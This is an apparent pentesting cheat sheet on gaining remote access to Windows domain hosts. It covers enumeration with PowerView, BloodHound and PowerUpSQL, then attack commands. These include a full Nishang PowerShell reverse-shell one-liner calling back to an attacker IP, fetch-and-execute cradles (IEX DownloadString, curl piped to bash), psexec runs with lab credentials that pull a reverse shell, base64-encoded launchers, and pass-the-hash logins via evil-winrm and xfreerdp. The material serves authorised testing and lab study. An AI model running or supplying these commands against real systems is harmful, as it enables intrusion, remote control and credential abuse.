WINDOWS REMOTE ACCESS

PRIMARY CATEGORY → WINDOWS PENTESTING  •  WINDOWS CREDENTIALED ENUMERATION

Enumeration

An operator with control over a domain account can gather most of the domain information. This includes a domain user account that can connect remotely to domain-joined hosts due to certain rights provided directly to itself or via group membership

Attackers often overlook this type of primes, where they compromise a domain user account which is not a local admin on any domain-joined host but has remote access to one or more of them, and then, they can use that account in order to stablish a remote connection and proceed with further actions such as pillaging, privesc and so on

This type of user accounts have these rights as they belong to groups such as Remote Desktop Users (RDP) and Remote Management Users (WinRM) or have a sysadmin role on a MSSQL instance

Therefore, we should always enumerate this remote accesses and don’t overlook any of them as they can make the difference during an assessment where all our resources have run out

To do so, the most efficient and easiest way would be using BloodHound, as it has several edges related to remote connections.

However, if we wan to be more manual, Powerview, along with PowerUpSQL, is the way to go

RDP

Powerview

Powerview.ps1

Get-NetLocalGroupMember

One Domain Computer

Get-NetLocalGroupMember -ComputerName <TARGET> -GroupName "Remote Desktop Users"

All Domain Computers

Get-DomainComputer | % { Get-NetLocalGroupMember -Computername $_.name -GroupName "Remote Desktop Users" }

BloodHound

BloodHound CE

• CanRDP

Zoom in

WinRM (MS-PSRP)

Powerview

Powerview.ps1

Get-NetLocalGroupMember

One Domain Computer

Get-NetLocalGroupMember -ComputerName <TARGET> -GroupName "Remote Management Users"

All Domain Computers

Get-DomainComputer | % { Get-NetLocalGroupMember -Computername $_.name -GroupName "Remote Management Users" }

BloodHound

BloodHound CE

• CanPSRemote

Zoom in

BloodHound Cypher Query

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

MSSQL

PowerUpSQL

PowerUpSQL

• Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/NetSPI/PowerUpSQL/raw/refs/heads/master/PowerUpSQL.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/NetSPI/PowerUpSQL/raw/refs/heads/master/PowerUpSQL.ps1' -OutFile '.\PowerUpSQL.ps1'

Import-Module '.\PowerUpSQL.ps1'

• Usage

Get all MSSQL Instances in a Domain

Get-SQLInstanceDomain

BloodHound

BloodHound CE

• SQLAdmin

Zoom in

BloodHound Cypher Query

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

---

HTTP

Nishang PS Reverse Shell

Nishang Reverse Shell Oneliner

• From the Attacker 🗡️

Reverse Shell

Modify the Oneliner IP Address and Port as follows

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.30',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Simple HTTP Server

Check Simple HTTP Servers here

Setup a Web Server to share the Reverse Shell

python3 -m http.server 8888

Listening Socket

Check Listening Sockets → Reference I  ⚡  Reference II

Listen in at the port set in the Reverse Shell Script

rlwrap nc -nlvp 1234

• From the Target 🎯

Reverse Connection

Request the Reverse Shell → (New-Object Net.WebClient).DownloadString('<URL>')

Execute it → IEX or Invoke-Expression

Target

start /b powershell.exe -Command IEX (New-Object Net.Webclient).DownloadString('http://10.10.16.30:443/reverse_shell.ps1')

Same in Bash

The above Reverse Shell Workflow would be the same as the following with bash

curl --silent --request GET --location "URL" | bash -

PS v3.0 or >

Target

IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest '<URL>')

---

SMB

PSExec

This tool from impacket can be used to stablish a bind shell if the user authenticated has administrative privileges in the Workstation or Domain Computer

CMD

This tool allow an attacker to get a shell with cmd.exe

psexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>

PS

Sometimes it gets tricky to launch a powershell.exe instance. We can accomplish this task simply stablishing a reverse shell via Invoke-Expression aka IEX

Reverse Shell Payload

Nishang Reverse Shell Oneliner

curl --silent --request GET --location --output <FILE> "https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1"

Simple HTTP Server

python3 -m http.server <PORT>

Listening Socket

rlwrap -CaR nc -nlvp <PORT>

HTTP Request From Target and Reverse Shell Execution

psexec.py -dc-ip 10.129.135.22 active.htb/Administrator:Ticketmaster1968@active.htb "powershell.exe -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.34:8888/reverse.ps1')"

Caution

If something goes wrong and the reverse connection cannot be stablished, just change the above powershell command’s scheme codification to UTF-16LE and Base64 encode it

echo -n "IEX (New-Object Net.WebClient).DownloadString('http://HOST:PORT/FILE')" | iconv --to-code UTF-16LE | base64 -w 0 ; echo

Then pass that Base64 String as argument to the powershell.exe instance executed by psexec

psexec.py -dc-ip TARGET DOMAIN/USERNAME:PASSWORD@TARGET 'powershell.exe -Exec Bypass -Enc "BASE64_STRING"'

---

RPC

WMIExec

wmiexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>

---

WinRM

EvilWinRM

Password Auth

Reference

evil-winrm --ip <TARGET> --port <PORT> --user <USER> --password <PASSWORD>

Pass The Hash

evil-winrm --ip <TARGET> --port <PORT> --user <USER> --hash <NTHASH>

SSL Enabled

evil-winrm --ip <TARGET> --port <PORT> --ssl --user <USER> --password <PASSWORD>

Upload and Download a File

Warning

The Absolute Path has to be specified for both uploading and downloading

PS> upload <LOCAL_PATH> <TARGET_FULL_PATH> # Upload
PS> download <TARGET_FULL_PATH> <LOCAL_PATH> # Download

Invoke-Command

Creation of Credentials Object

$user = '<DOMAIN>\<USERNAME>'
$password = ConverTo-SecureString -AsPlainText -Force -String <PLAIN_PASSWORD>

$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$password

Command Execution as Another User

Invoke-Command -ComputerName <HOSTNAME> -Credential $cred -ScriptBlock { <COMMAND> }

Enter-PSSession

$user = '<DOMAIN>\<USERNAME>'
$password = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWORD>'

$cred = New-Object -TypeName System.Management.Automation.PSCredential ($user, $password)

Enter-PSSession -ComputerName <HOSTNAME> -Credential $cred

Netexec

Reference

Remote Command Execution

• CMD

netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -x <COMMAND>

• PS

netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -X <COMMAND>

---

RDP

RDesktop

rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORWD> <TARGET>

XFreeRDP

Password Auth

xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>

Pass The Hash

xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>

Skip Certificate Validation

xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignore

Remmina

CLI

remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>

---

MSSQL

See here for more information

PowerUPSQL

PowerUPSQL

Run Custom Queries on a given MSSQL Instance

Get-SQLQuery -Verbose -Instance '<TARGET>,<PORT>' -username '<DOMAIN>\<USER>' -password '<PASSWD>' -query '<QUERY>'